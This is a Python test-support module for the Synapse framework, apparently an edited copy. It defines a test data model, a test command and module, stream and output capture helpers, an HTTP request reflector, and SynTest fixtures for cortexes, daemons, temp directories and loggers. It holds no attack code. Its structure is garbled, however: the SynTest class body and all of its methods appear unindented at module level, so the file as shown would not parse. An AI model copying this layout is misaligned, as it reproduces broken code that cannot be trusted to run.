        ('test:ndef', ('ndef', {}), {}),

        ('test:runt', ('str', {'lower': True, 'strip': True}), {'doc': 'A Test runt node'}),
    ),

    # Universal properties applied to every form.
    'univs': (
        ('test:univ', ('int', {'min': -1, 'max': 10}), {'doc': 'A test universal property.'}),
        ('univarray', ('array', {'type': 'int'}), {'doc': 'A test array universal property.'}),
    ),

    # Forms (node types) and their secondary properties.
    'forms': (
        ('test:arrayprop', {}, (
            ('ints', ('array', {'type': 'test:int'}), {}),
        )),
        ('test:type10', {}, (
            ('intprop', ('int', {'min': 20, 'max': 30}), {}),
            ('int2', ('int', {}), {}),
            ('strprop', ('str', {'lower': 1}), {}),
            ('guidprop', ('guid', {'lower': 1}), {}),
            ('locprop', ('loc', {}), {}),
        )),
        ('test:cycle0', {}, (
            ('cycle1', ('test:cycle1', {}), {}),
        )),
        ('test:cycle1', {}, (
            ('cycle0', ('test:cycle0', {}), {}),
        )),
        ('test:type', {}, ()),
        ('test:comp', {}, (
            ('hehe', ('test:int', {}), {'ro': 1}),
            ('haha', ('test:lower', {}), {'ro': 1}),
        )),
        ('test:complexcomp', {}, (
            ('foo', ('test:int', {}), {'ro': 1}),
            ('bar', ('str', {'lower': 1}), {'ro': 1})
        )),
        ('test:int', {}, (
            ('loc', ('loc', {}), {}),
            ('int2', ('int', {}), {}),
        )),
        ('test:float', {}, (
            ('closed', ('float', {'min': 0.0, 'max': 360.0}), {}),
            ('open', ('float', {'min': 0.0, 'max': 360.0, 'minisvalid': False, 'maxisvalid': False}), {}),
        )),
        ('test:edge', {}, (
            ('n1', ('ndef', {}), {'ro': 1}),
            ('n1:form', ('str', {}), {'ro': 1}),
            ('n2', ('ndef', {}), {'ro': 1}),
            ('n2:form', ('str', {}), {'ro': 1}),
        )),
        ('test:guid', {}, (
            ('size', ('test:int', {}), {}),
            ('tick', ('test:time', {}), {}),
            ('posneg', ('test:sub', {}), {}),
            ('posneg:isbig', ('bool', {}), {}),
        )),
        ('test:str', {}, (
            ('bar', ('ndef', {}), {}),
            ('baz', ('nodeprop', {}), {}),
            ('tick', ('test:time', {}), {}),
            ('hehe', ('str', {}), {}),
        )),
        ('test:migr', {}, (
            ('bar', ('ndef', {}), {}),
            ('baz', ('nodeprop', {}), {}),
            ('tick', ('test:time', {}), {}),
        )),
        ('test:threetype', {}, (
            ('three', ('int', {}), {}),
        )),
        ('test:auto', {}, ()),
        ('test:hexa', {}, ()),
        ('test:hex4', {}, ()),
        ('test:ival', {}, (
            ('interval', ('ival', {}), {}),
        )),
        ('test:pivtarg', {}, (
            ('name', ('str', {}), {}),
        )),
        ('test:pivcomp', {}, (
            ('targ', ('test:pivtarg', {}), {}),
            ('lulz', ('test:str', {}), {}),
            ('tick', ('time', {}), {}),
            ('size', ('test:int', {}), {}),
            ('width', ('test:int', {}), {}),
        )),
        ('test:haspivcomp', {}, (
            ('have', ('test:pivcomp', {}), {}),
        )),
        ('test:ndef', {}, (
            ('form', ('str', {}), {'ro': 1}),
        )),
        ('test:runt', {'runt': True}, (
            ('tick', ('time', {}), {'ro': True}),
            ('lulz', ('str', {}), {}),
            ('newp', ('str', {}), {'doc': 'A stray property we never use in nodes.'}),
        )),
    ),
}
class TestCmd(s_storm.Cmd):
    '''
    A test command
    '''
    name = 'testcmd'
    # Declared form hints: input/output forms and nodedata keys this
    # command claims to consume and produce.
    forms = {
        'input': [
            'test:str',
            'inet:ipv6',
        ],
        'output': [
            'inet:fqdn',
        ],
        'nodedata': [
            ('foo', 'inet:ipv4'),
            ('bar', 'inet:fqdn'),
        ],
    }

    def getArgParser(self):
        # No extra arguments beyond the base Cmd parser.
        pars = s_storm.Cmd.getArgParser(self)
        return pars

    async def execStormCmd(self, runt, genr):
        # Print each node's ndef and pass node/path through unchanged.
        async for node, path in genr:
            await runt.printf(f'{self.name}: {node.ndef}')
            yield node, path
class TestModule(s_module.CoreModule):
    '''CoreModule loaded into test Cortexes; wires up the test model and helpers.'''

    # Fixed guid used for the module's seeded meta:source node.
    testguid = '8f1401de15918358d5247e21ca29a814'

    async def initCoreModule(self):
        # Register the feed func, seed the meta:source node, and hook up the
        # storm lib, health check, and test:runt runtime-node handlers.
        self.core.setFeedFunc('com.test.record', self.addTestRecords)

        async with await self.core.snap() as snap:
            node = await snap.getNodeByNdef(('meta:source', self.testguid))
            if node is None:
                await snap.addNode('meta:source', self.testguid, {'name': 'test'})

        self.core.addStormLib(('test',), LibTst)

        self.healthy = True
        self.core.addHealthFunc(self._testModHealth)

        form = self.model.form('test:runt')
        self.core.addRuntLift(form.full, self._testRuntLift)
        for prop in form.props.values():
            self.core.addRuntLift(prop.full, self._testRuntLift)

        self.core.addRuntPropSet('test:runt:lulz', self._testRuntPropSetLulz)
        self.core.addRuntPropDel('test:runt:lulz', self._testRuntPropDelLulz)

    async def _testModHealth(self, health):
        # Report nominal/failed based on the self.healthy toggle.
        if self.healthy:
            health.update(self.getModName(), 'nominal',
                          'Test module is healthy', data={'beep': 0})
        else:
            health.update(self.getModName(), 'failed',
                          'Test module is unhealthy', data={'beep': 1})

    async def addTestRecords(self, snap, items):
        # Feed function: each item becomes a test:str node.
        for name in items:
            await snap.addNode('test:str', name)

    async def _testRuntLift(self, full, valu=None, cmpr=None):
        # Lift handler: materialize a fixed set of TestRunt objects and
        # delegate filtering to _doRuntLift.
        now = s_common.now()
        modl = self.core.model
        runtdefs = [
            (' BEEP ', {'tick': modl.type('time').norm('2001')[0], 'lulz': 'beep.sys', '.created': now}),
            ('boop', {'tick': modl.type('time').norm('2010')[0], '.created': now}),
            ('blah', {'tick': modl.type('time').norm('2010')[0], 'lulz': 'blah.sys'}),
            ('woah', {}),
        ]
        runts = {}
        for name, props in runtdefs:
            runts[name] = TestRunt(name, **props)
        genr = runts.values
        async for node in self._doRuntLift(genr, full, valu, cmpr):
            yield node

    async def _doRuntLift(self, genr, full, valu=None, cmpr=None):
        # Yield storage nodes filtered by form/prop and optional comparator.
        if cmpr is not None:
            filt = self.model.prop(full).type.getCmprCtor(cmpr)(valu)
            if filt is None:
                raise s_exc.BadCmprValu(cmpr=cmpr)

        fullprop = self.model.prop(full)
        if fullprop.isform:
            # Lifting by form: filter on the primary (ndef) value.
            if cmpr is None:
                for obj in genr():
                    yield obj.getStorNode(fullprop)
                return
            for obj in genr():
                sode = obj.getStorNode(fullprop)
                if filt(sode[1]['ndef'][1]):
                    yield sode
        else:
            # Lifting by secondary prop: filter on that prop's value.
            for obj in genr():
                sode = obj.getStorNode(fullprop.form)
                propval = sode[1]['props'].get(fullprop.name)
                if propval is not None and (cmpr is None or filt(propval)):
                    yield sode

    async def _testRuntPropSetLulz(self, node, prop, valu):
        # Prop-set handler: enforce the ".sys" suffix and update in place.
        curv = node.get(prop.name)
        valu, _ = prop.type.norm(valu)
        if curv == valu:
            return False
        if not valu.endswith('.sys'):
            raise s_exc.BadTypeValu(mesg='test:runt:lulz must end with ".sys"',
                                    valu=valu, name=prop.full)
        node.props[prop.name] = valu
        # In this test helper, we do NOT persist the change to our in-memory
        # storage of row data, so a re-lift of the node would not reflect the
        # change that a user made here.
        return True

    async def _testRuntPropDelLulz(self, node, prop,):
        # Prop-del handler: pop the prop; False when it was not present.
        curv = node.props.pop(prop.name, s_common.novalu)
        if curv is s_common.novalu:
            return False
        # In this test helper, we do NOT persist the change to our in-memory
        # storage of row data, so a re-lift of the node would not reflect the
        # change that a user made here.
        return True

    def getModelDefs(self):
        return (
            ('test', testmodel),
        )

    def getStormCmds(self):
        return (TestCmd,
                )
class TstEnv:
    '''Attribute-style registry of test items with async teardown support.'''

    def __init__(self):
        self.items = {}
        self.tofini = []

    def __getattr__(self, prop):
        # Unknown names must raise AttributeError so hasattr() behaves.
        found = self.items.get(prop)
        if found is None:
            raise AttributeError(prop)
        return found

    async def __aenter__(self):
        return self

    async def __aexit__(self, cls, exc, tb):
        await self.fini()

    def add(self, name, item, fini=False):
        '''Register item under name; if fini, tear it down in fini().'''
        self.items[name] = item
        if fini:
            self.tofini.append(item)

    async def fini(self):
        '''Await fini() on every registered teardown item, in add order.'''
        for each in self.tofini:
            await each.fini()
class TstOutPut(s_output.OutPutStr):

    def expect(self, substr, throw=True):
        '''
        Check if a string is present in the messages captured by the OutPutStr object.

        Args:
            substr (str): String to check for the existence of.
            throw (bool): If True, a missing substr results in a Exception being thrown.

        Returns:
            bool: True if the string is present; False if the string is not present and throw is False.
        '''
        whole = str(self)
        if substr in whole:
            return True
        if throw:
            mesg = 'TestOutPut.expect(%s) not in %s' % (substr, whole)
            raise s_exc.SynErr(mesg=mesg)
        return False

    def clear(self):
        # Drop all captured messages.
        self.mesgs.clear()
class CmdGenerator:
    '''Callable that replays a scripted sequence of CLI commands.'''

    def __init__(self, cmds):
        self.cmds = collections.deque(cmds)

    def addCmd(self, cmd):
        '''
        Add a command to the end of the list of commands returned by the CmdGenerator.

        Args:
            cmd (str): Command to add to the list of commands to return.
        '''
        self.cmds.append(cmd)

    def __call__(self, *args, **kwargs):
        return self._corocall(*args, **kwargs)

    async def _corocall(self, *args, **kwargs):
        if not self.cmds:
            raise Exception('No further actions.')
        nexi = self.cmds.popleft()
        # A scripted exception instance is raised instead of returned so a
        # test can simulate ctrl-c or cli failures.
        if isinstance(nexi, (Exception, KeyboardInterrupt)):
            raise nexi
        return nexi
class StreamEvent(io.StringIO, threading.Event):
    '''
    A combination of a io.StringIO object and a threading.Event object.
    '''
    def __init__(self, *args, **kwargs):
        io.StringIO.__init__(self, *args, **kwargs)
        threading.Event.__init__(self)
        self.mesg = ''

    def setMesg(self, mesg):
        '''
        Clear the internal event and set a new message that is used to set the event.

        Args:
            mesg (str): The string to monitor for.

        Returns:
            None
        '''
        self.mesg = mesg
        self.clear()

    def write(self, s):
        io.StringIO.write(self, s)
        # Fire the event the moment a written chunk contains the message.
        wanted = self.mesg
        if wanted and wanted in s:
            self.set()
class AsyncStreamEvent(io.StringIO, asyncio.Event):
    '''
    A combination of a io.StringIO object and an asyncio.Event object.
    '''
    def __init__(self, *args, **kwargs):
        io.StringIO.__init__(self, *args, **kwargs)
        # BUG FIX: the explicit loop= argument was deprecated in Python 3.8
        # and removed in 3.10, where passing it raises TypeError.  Event
        # binds to the running loop on first use, so no argument is needed.
        asyncio.Event.__init__(self)
        self.mesg = ''

    def setMesg(self, mesg):
        '''
        Clear the internal event and set a new message that is used to set the event.

        Args:
            mesg (str): The string to monitor for.

        Returns:
            None
        '''
        self.mesg = mesg
        self.clear()

    def write(self, s):
        io.StringIO.write(self, s)
        # Fire the event as soon as a written chunk contains the message.
        if self.mesg and self.mesg in s:
            self.set()

    async def wait(self, timeout=None):
        '''Wait for the event, optionally bounded by timeout seconds.'''
        if timeout is None:
            return await asyncio.Event.wait(self)
        return await s_coro.event_wait(self, timeout=timeout)
class HttpReflector(s_httpapi.Handler):
    '''Test handler which reflects get/post data back to the caller'''

    async def get(self):
        # Echo query params (decoded), headers, and path as a rest retn.
        resp = {}
        if self.request.arguments:
            d = collections.defaultdict(list)
            resp['params'] = d
            for k, items in self.request.arguments.items():
                for v in items:
                    d[k].append(v.decode())

        resp['headers'] = dict(self.request.headers)
        resp['path'] = self.request.path
        self.sendRestRetn(resp)

    async def post(self):
        # Same as get(), plus the base64-encoded request body when present.
        resp = {}
        if self.request.arguments:
            d = collections.defaultdict(list)
            resp['params'] = d
            for k, items in self.request.arguments.items():
                for v in items:
                    d[k].append(v.decode())

        resp['headers'] = dict(self.request.headers)
        resp['path'] = self.request.path
        if self.request.body:
            resp['body'] = s_common.enbase64(self.request.body)
        self.sendRestRetn(resp)
s_task.vardefault('applynest', lambda: None)
async def _doubleapply(self, indx, item):
    '''
    Just like NexusRoot._apply, but calls the function twice. Patched in when global variable SYNDEV_NEXUS_REPLAY
    is set.
    '''
    try:
        # Guard against re-entrant handlers: a nested apply while one is in
        # flight indicates a bug in the handler under test.
        nestitem = s_task.varget('applynest')
        assert nestitem is None, f'Failure: have nested nexus actions, inner item is {item}, outer item was {nestitem}'
        s_task.varset('applynest', item)

        nexsiden, event, args, kwargs, _ = item

        nexus = self._nexskids[nexsiden]
        func, passitem = nexus._nexshands[event]
        # Invoke the handler twice: the first return value is what callers
        # see; the second call checks the handler is replay-safe.
        if passitem:
            retn = await func(nexus, *args, nexsitem=(indx, item), **kwargs)
            await func(nexus, *args, nexsitem=(indx, item), **kwargs)
            return retn

        retn = await func(nexus, *args, **kwargs)
        await func(nexus, *args, **kwargs)
        return retn
    finally:
        s_task.varset('applynest', None)
class SynTest(unittest.TestCase):
'''
Mark all async test methods as s_glob.synchelp decorated.
Note:
This precludes running a single unit test via path using the unittest module.
'''
def __init__(self, *args, **kwargs):
    # Wrap every async test_* coroutine method with s_glob.synchelp so the
    # stock (synchronous) unittest runner can execute it.
    unittest.TestCase.__init__(self, *args, **kwargs)
    self._NextBuid = 0
    self._NextGuid = 0
    for s in dir(self):
        attr = getattr(self, s, None)
        # If s is an instance method and starts with 'test_', synchelp wrap it
        if inspect.iscoroutinefunction(attr) and s.startswith('test_') and inspect.ismethod(attr):
            setattr(self, s, s_glob.synchelp(attr))
def checkNode(self, node, expected):
    '''
    Check that a node's ndef and props match an (ndef, props) tuple.
    Declared-but-untested (non-universal) props are logged as a warning.
    '''
    ex_ndef, ex_props = expected
    self.eq(node.ndef, ex_ndef)
    # Plain loop: the original list comprehension was executed purely for
    # its side effects and built a throwaway list on every call.
    for prop, valu in ex_props.items():
        self.eq(node.get(prop), valu, msg=f'Prop {prop} does not match')

    diff = {prop for prop in (set(node.props) - set(ex_props)) if not prop.startswith('.')}
    if diff:
        logger.warning('form(%s): untested properties: %s', node.form.name, diff)
def worker(self, func, *args, **kwargs):
    '''
    Fire a worker thread to run the given func(*args,**kwargs)

    Returns:
        threading.Thread: The already-started thread.
    '''
    # BUG FIX: the original definition omitted ``self``, so calling
    # self.worker(func) bound the instance to ``func`` and shifted every
    # argument by one.  An instance method must accept self explicitly.
    def work():
        return func(*args, **kwargs)

    thr = threading.Thread(target=work)
    thr.start()
    return thr
def printed(self, msgs, text):
    '''Assert that a storm message stream contains a print message == text.'''
    for mesg in msgs:
        # Guard clauses instead of nested conditionals.
        if mesg[0] != 'print':
            continue
        if mesg[1].get('mesg') == text:
            return

    raise Exception('print output not found: %r' % (text,))
def skip(self, mesg):
    # Convenience wrapper: skip the current test with the given message.
    raise unittest.SkipTest(mesg)
@contextlib.contextmanager
def getRegrDir(self, *path):
    '''
    Yield a temp-dir copy of a path from the regression repo.

    Skips the test when SYN_REGRESSION_REPO is unset; raises when it is
    set but does not point at a directory.
    '''
    regr = os.getenv('SYN_REGRESSION_REPO')
    if regr is None: # pragma: no cover
        raise unittest.SkipTest('SYN_REGRESSION_REPO is not set')

    regr = s_common.genpath(regr)

    if not os.path.isdir(regr): # pragma: no cover
        raise Exception('SYN_REGRESSION_REPO is not a dir')

    dirn = os.path.join(regr, *path)
    # Work on a copy so the regression repo itself is never modified.
    with self.getTestDir(copyfrom=dirn) as regrdir:
        yield regrdir
@contextlib.asynccontextmanager
async def getRegrCore(self, vers):
    # Open a regression Cortex stored under cortexes/<vers> in the repo.
    with self.getRegrDir('cortexes', vers) as dirn:
        async with await s_cortex.Cortex.anit(dirn) as core:
            yield core
def skipIfNoInternet(self):  # pragma: no cover
    '''
    Allow skipping a test if SYN_TEST_SKIP_INTERNET envar is set.

    Raises:
        unittest.SkipTest if the SYN_TEST_SKIP_INTERNET envar is set to a nonzero integer.
    '''
    if bool(int(os.getenv('SYN_TEST_SKIP_INTERNET', 0))):
        raise unittest.SkipTest('SYN_TEST_SKIP_INTERNET envar set')
def skipLongTest(self):  # pragma: no cover
    '''
    Allow skipping a test if SYN_TEST_SKIP_LONG envar is set.

    Raises:
        unittest.SkipTest if the SYN_TEST_SKIP_LONG envar is set to a nonzero integer.
    '''
    if bool(int(os.getenv('SYN_TEST_SKIP_LONG', 0))):
        raise unittest.SkipTest('SYN_TEST_SKIP_LONG envar set')
def getTestOutp(self):
    '''
    Get an output instance with an expect() helper.

    Returns:
        TstOutPut: A TstOutPut instance.
    '''
    return TstOutPut()
def thisHostMust(self, **props):  # pragma: no cover
    '''
    Requires a host having a specific property.

    Args:
        **props: property name/value pairs checked via s_thishost.get().

    Raises:
        unittest.SkipTest if the required property is missing.
    '''
    for k, v in props.items():
        if s_thishost.get(k) != v:
            raise unittest.SkipTest('skip thishost: %s!=%r' % (k, v))
def thisHostMustNot(self, **props):  # pragma: no cover
    '''
    Requires a host to not have a specific property.

    Args:
        **props: property name/value pairs checked via s_thishost.get().

    Raises:
        unittest.SkipTest if the required property is present.
    '''
    for k, v in props.items():
        if s_thishost.get(k) == v:
            raise unittest.SkipTest('skip thishost: %s==%r' % (k, v))
@contextlib.asynccontextmanager
async def getTestAxon(self, dirn=None):
    '''
    Get a test Axon as an async context manager.

    Args:
        dirn (str): Optional existing directory for the Axon; a temporary
            directory is created (and cleaned up) when omitted.

    Returns:
        s_axon.Axon: A Axon object.
    '''
    if dirn is not None:
        async with await s_axon.Axon.anit(dirn) as axon:
            yield axon
        return

    with self.getTestDir() as dirn:
        async with await s_axon.Axon.anit(dirn) as axon:
            yield axon
@contextlib.contextmanager
def withTestCmdr(self, cmdg):
    # Patch getItemCmdr so every constructed cli uses cmdg as its prompt
    # (typically a CmdGenerator supplying scripted input).
    getItemCmdr = s_cmdr.getItemCmdr

    async def getTestCmdr(*a, **k):
        cli = await getItemCmdr(*a, **k)
        cli.prompt = cmdg
        return cli

    with mock.patch('synapse.lib.cmdr.getItemCmdr', getTestCmdr):
        yield
@contextlib.contextmanager
def withCliPromptMockExtendOutp(self, outp):
    '''
    Context manager to mock our use of Prompt Toolkit's print_formatted_text function and
    extend the lines to an output object.

    Args:
        outp (TstOutPut): The outp to extend.

    Notes:
        This extends the outp with the lines AFTER the context manager has exited.

    Returns:
        mock.MagicMock: Yields a mock.MagicMock object.
    '''
    with self.withCliPromptMock() as patch:
        yield patch
    self.extendOutpFromPatch(outp, patch)
@contextlib.contextmanager
def withCliPromptMock(self):
    '''
    Context manager to mock our use of Prompt Toolkit's print_formatted_text function.

    Returns:
        mock.MagicMock: Yields a mock.MagicMock object.
    '''
    with mock.patch('synapse.lib.cli.print_formatted_text',
                    mock.MagicMock(return_value=None)) as patch:  # type: mock.MagicMock
        yield patch
@contextlib.contextmanager
def withSetLoggingMock(self):
    '''
    Context manager to mock calls to the setlogging function to avoid unittests calling logging.basicConfig.

    Returns:
        mock.MagicMock: Yields a mock.MagicMock object.
    '''
    with mock.patch('synapse.common.setlogging',
                    mock.MagicMock(return_value=None)) as patch:  # type: mock.MagicMock
        yield patch
def getMagicPromptLines(self, patch):
    '''
    Get the text lines from a MagicMock object from withCliPromptMock.

    Args:
        patch (mock.MagicMock): The MagicMock object from withCliPromptMock.

    Returns:
        list: A list of lines.
    '''
    self.true(patch.called, 'Assert prompt was called')
    lines = []
    for call in patch.call_args_list:
        item = call[0][0]
        if isinstance(item, str):
            lines.append(item)
        elif isinstance(item, FormattedText):
            # FormattedText entries are (style, text) pairs; keep the text.
            _style, text = item[0]
            lines.append(text)
        else:
            raise ValueError(f'Unknown arg: {type(item)}/{item}')
    return lines
def getMagicPromptColors(self, patch):
    '''
    Get the colored lines from a MagicMock object from withCliPromptMock.

    Args:
        patch (mock.MagicMock): The MagicMock object from withCliPromptMock.

    Returns:
        list: A list of tuples, containing color and line data.
    '''
    self.true(patch.called, 'Assert prompt was called')
    lines = []
    for args in patch.call_args_list:
        arg = args[0][0]
        if isinstance(arg, str):
            # Plain strings carry no color information; skip them.
            continue
        if isinstance(arg, FormattedText):
            color, text = arg[0]
            lines.append((color, text))
            continue
        raise ValueError(f'Unknown arg: {type(arg)}/{arg}')
    return lines
def extendOutpFromPatch(self, outp, patch):
    '''
    Extend an Outp with lines from a MagicMock object from withCliPromptMock.

    Args:
        outp (TstOutPut): The outp to extend.
        patch (mock.MagicMock): The patch object.

    Returns:
        None: Returns none.
    '''
    # Plain loop: the original built a throwaway list comprehension purely
    # for the printf() side effect.
    for line in self.getMagicPromptLines(patch):
        outp.printf(line)
@contextlib.asynccontextmanager
async def getTestReadWriteCores(self, conf=None, dirn=None):
    '''
    Get a read/write core pair.

    Notes:
        By default, this returns the same cortex. It is expected that
        a test which needs two distinct Cortexes implements the bridge
        themselves.

    Returns:
        (s_cortex.Cortex, s_cortex.Cortex): A tuple of Cortex objects.
    '''
    async with self.getTestCore(conf=conf, dirn=dirn) as core:
        yield core, core

@contextlib.contextmanager
def withNexusReplay(self, replay=False):
    '''
    Patch so that the Nexus apply log is applied twice. Useful to verify idempotency.

    Args:
        replay (bool): Force the replay patch regardless of the environment.

    Notes:
        This is applied if the environment variable SYNDEV_NEXUS_REPLAY is set
        or the replay argument is set to True.
        NOTE(review): any non-empty envar value (including '0') enables the
        patch, since the envar string is used for truthiness directly -
        confirm this is intended.

    Returns:
        contextlib.ExitStack: An exitstack object.
    '''
    replay = os.environ.get('SYNDEV_NEXUS_REPLAY', default=replay)
    with contextlib.ExitStack() as stack:
        if replay:
            stack.enter_context(mock.patch.object(s_nexus.NexsRoot, '_apply', _doubleapply))
        yield stack
@contextlib.asynccontextmanager
async def getTestCore(self, conf=None, dirn=None):
    '''
    Get a simple test Cortex as an async context manager.

    Args:
        conf (dict): Optional cortex configuration. A default test config is used when None.
        dirn (str): Optional directory to back the Cortex; a temp dir is used when None.

    Returns:
        s_cortex.Cortex: A Cortex object.
    '''
    if conf is None:
        conf = {'layer:lmdb:map_async': True,
                'provenance:en': True,
                'nexslog:en': True,
                'layers:logedits': True,
                }

    # Deep copy so the caller's config dict is never mutated.
    conf = copy.deepcopy(conf)

    mods = conf.get('modules')
    if mods is None:
        mods = []
        conf['modules'] = mods

    # Every test cortex loads the TestModule model extensions.
    mods.append(('synapse.tests.utils.TestModule', {'key': 'valu'}))

    with self.withNexusReplay():

        if dirn is not None:
            async with await s_cortex.Cortex.anit(dirn, conf=conf) as core:
                yield core
            return

        with self.getTestDir() as dirn:
            async with await s_cortex.Cortex.anit(dirn, conf=conf) as core:
                yield core

@contextlib.asynccontextmanager
async def getTestCoreAndProxy(self, conf=None, dirn=None):
    '''
    Get a test Cortex and the Telepath Proxy to it.

    Returns:
        (s_cortex.Cortex, s_cortex.CoreApi): The Cortex and a Proxy representing a CoreApi object.
    '''
    async with self.getTestCore(conf=conf, dirn=dirn) as core:
        # Enable storm logging on the shared test cortex.
        core.conf['storm:log'] = True
        async with core.getLocalProxy() as prox:
            yield core, prox
@contextlib.asynccontextmanager
async def getTestCryo(self, dirn=None):
    '''
    Get a simple test Cryocell as an async context manager.

    Args:
        dirn (str): Optional backing directory; a temp dir is used when None.

    Returns:
        s_cryotank.CryoCell: Test cryocell.
    '''
    if dirn is None:
        with self.getTestDir() as dirn:
            async with await s_cryotank.CryoCell.anit(dirn) as cryo:
                yield cryo
    else:
        async with await s_cryotank.CryoCell.anit(dirn) as cryo:
            yield cryo
@contextlib.asynccontextmanager
async def getTestCryoAndProxy(self, dirn=None):
    '''
    Get a test Cryocell and the Telepath Proxy to it.

    Returns:
        (s_cryotank: CryoCell, s_cryotank.CryoApi): The CryoCell and a Proxy representing a CryoApi object.
    '''
    async with self.getTestCryo(dirn=dirn) as cryo:
        async with cryo.getLocalProxy() as prox:
            yield cryo, prox

@contextlib.asynccontextmanager
async def getTestDmon(self):
    '''
    Get a test Daemon listening on an ephemeral tcp port, with the test
    certdir patched in as the default certificate directory.

    Returns:
        s_daemon.Daemon: The listening test daemon.
    '''
    with self.getTestDir(mirror='certdir') as certdir:
        async with await s_daemon.Daemon.anit(certdir=certdir) as dmon:
            # Port 0 lets the OS pick a free port.
            await dmon.listen('tcp://127.0.0.1:0/')
            with mock.patch('synapse.lib.certdir.defdir', certdir):
                yield dmon
@contextlib.asynccontextmanager
async def getTestCell(self, ctor, conf=None, dirn=None):
    '''
    Get a test Cell.

    Args:
        ctor: Cell constructor class (anit'd to create the cell).
        conf (dict): Optional cell configuration.
        dirn (str): Optional backing directory; a temp dir is used when None.
    '''
    # Deep copy so the caller's config dict is never mutated.
    conf = copy.deepcopy({} if conf is None else conf)

    if dirn is None:
        with self.getTestDir() as dirn:
            async with await ctor.anit(dirn, conf=conf) as cell:
                yield cell
    else:
        async with await ctor.anit(dirn, conf=conf) as cell:
            yield cell
@contextlib.asynccontextmanager
async def getTestCoreProxSvc(self, ssvc, ssvc_conf=None, core_conf=None):
    '''
    Get a test Cortex, the Telepath Proxy to it, and a test service instance.

    Args:
        ssvc: Ctor to the Test Service.
        ssvc_conf: Service configuration.
        core_conf: Cortex configuration.

    Returns:
        (s_cortex.Cortex, s_cortex.CoreApi, testsvc): The Cortex, Proxy, and service instance.
    '''
    async with self.getTestCoreAndProxy(core_conf) as (core, prox):
        async with self.getTestCell(ssvc, ssvc_conf) as testsvc:
            await self.addSvcToCore(testsvc, core)
            yield core, prox, testsvc

async def addSvcToCore(self, svc, core, svcname='svc'):
    '''
    Add a service to a Cortex using telepath over tcp.
    '''
    svc.dmon.share('svc', svc)
    root = await svc.auth.getUserByName('root')
    await root.setPasswd('root')
    info = await svc.dmon.listen('tcp://127.0.0.1:0/')
    # Stash the bound (host, port) so tests can reach the service directly.
    svc.dmon.test_addr = info
    host, port = info
    surl = f'tcp://root:root@127.0.0.1:{port}/svc'
    await self.runCoreNodes(core, f'service.add {svcname} {surl}')
    # Block until the cortex reports the service is available.
    await self.runCoreNodes(core, f'$lib.service.wait({svcname})')
def getTestUrl(self, dmon, name, **opts):
    '''
    Construct a tcp:// telepath URL for a shared object on a test daemon.

    Args:
        dmon: Daemon whose .addr attribute provides the (host, port) tuple.
        name (str): Name of the shared object.
        **opts: Optional 'user' and 'passwd' to embed in the URL netloc.

    Returns:
        str: A tcp:// URL string.
    '''
    host, port = dmon.addr
    netloc = f'{host}:{port}'

    user = opts.get('user')
    passwd = opts.get('passwd')
    # Credentials are only embedded when both parts are present.
    if user is not None and passwd is not None:
        netloc = f'{user}:{passwd}@{netloc}'

    return f'tcp://{netloc}/{name}'
def getTestProxy(self, dmon, name, **kwargs):
    '''
    Open a telepath proxy to a named object shared on a test daemon.
    '''
    host, port = dmon.addr
    kwargs.update({'host': host, 'port': port})
    return s_telepath.openurl(f'tcp:///{name}', **kwargs)

@contextlib.contextmanager
def getTestDir(self, mirror=None, copyfrom=None, chdir=False, startdir=None):
    '''
    Get a temporary directory for test purposes.
    This destroys the directory afterwards.

    Args:
        mirror (str): A directory to mirror into the test directory.
        copyfrom (str): An arbitrary directory to copy into the test directory.
        chdir (bool): If True, chdir into the test directory for the duration
            of the context manager (the previous cwd is restored on exit).
        startdir (str): The directory under which to place the temporary directory.

    Notes:
        The mirror argument is normally used to mirror test directory
        under ``synapse/tests/files``. This is accomplished by passing in
        the name of the directory (such as ``testcore``) as the mirror
        argument.

        If the ``mirror`` argument is an absolute directory, that directory
        will be copied to the test directory.

    Returns:
        str: The path to a temporary directory.
    '''
    curd = os.getcwd()
    tempdir = tempfile.mkdtemp(dir=startdir)
    try:
        dstpath = tempdir

        if mirror is not None:
            srcpath = self.getTestFilePath(mirror)
            dstpath = os.path.join(dstpath, 'mirror')
            shutil.copytree(srcpath, dstpath)

        elif copyfrom is not None:
            dstpath = os.path.join(dstpath, 'mirror')
            shutil.copytree(copyfrom, dstpath)

        if chdir:
            os.chdir(dstpath)

        yield dstpath

    finally:
        if chdir:
            os.chdir(curd)
        shutil.rmtree(tempdir, ignore_errors=True)

def getTestFilePath(self, *names):
    '''
    Get the path to a file under ``synapse/tests/files``.
    '''
    import synapse.tests.__init__
    path = os.path.dirname(synapse.tests.__init__.__file__)
    return os.path.join(path, 'files', *names)
@contextlib.contextmanager
def getLoggerStream(self, logname, mesg=''):
    '''
    Get a logger and attach a io.StringIO object to the logger to capture log messages.

    Args:
        logname (str): Name of the logger to get.
        mesg (str): A string which, if provided, sets the StreamEvent event if a message
                    containing the string is written to the log.

    Examples:
        Do an action and get the stream of log messages to check against::

            with self.getLoggerStream('synapse.foo.bar') as stream:
                # Do something that triggers a log message
                doSomething()

            stream.seek(0)
            mesgs = stream.read()
            # Do something with messages

        Do an action and wait for a specific log message to be written::

            with self.getLoggerStream('synapse.foo.bar', 'big badda boom happened') as stream:
                # Do something that triggers a log message
                doSomething()
                stream.wait(timeout=10)  # Wait for the mesg to be written to the stream

            stream.seek(0)
            mesgs = stream.read()
            # Do something with messages

        You can also reset the message and wait for another message to occur::

            with self.getLoggerStream('synapse.foo.bar', 'big badda boom happened') as stream:
                # Do something that triggers a log message
                doSomething()
                stream.wait(timeout=10)
                stream.setMesg('yo dawg')  # This will now wait for the 'yo dawg' string to be written.
                stream.wait(timeout=10)

            stream.seek(0)
            mesgs = stream.read()
            # Do something with messages

    Notes:
        This **only** captures logs for the current process.

    Yields:
        StreamEvent: A StreamEvent object
    '''
    stream = StreamEvent()
    stream.setMesg(mesg)
    handler = logging.StreamHandler(stream)
    slogger = logging.getLogger(logname)
    slogger.addHandler(handler)
    # Capture everything while attached; the previous level is restored on exit.
    level = slogger.level
    slogger.setLevel('DEBUG')
    # try/finally alone guarantees cleanup; the old ``except Exception: raise``
    # no-op re-raise was removed.
    try:
        yield stream
    finally:
        slogger.removeHandler(handler)
        slogger.setLevel(level)
@contextlib.contextmanager
def getAsyncLoggerStream(self, logname, mesg=''):
    '''
    Async version of getLoggerStream.

    Args:
        logname (str): Name of the logger to get.
        mesg (str): A string which, if provided, sets the StreamEvent event if a message
                    containing the string is written to the log.

    Notes:
        The event object mixed in for the AsyncStreamEvent is a asyncio.Event object.
        This requires the user to await the Event specific calls as necessary.

    Examples:
        Do an action and wait for a specific log message to be written::

            with self.getAsyncLoggerStream('synapse.foo.bar',
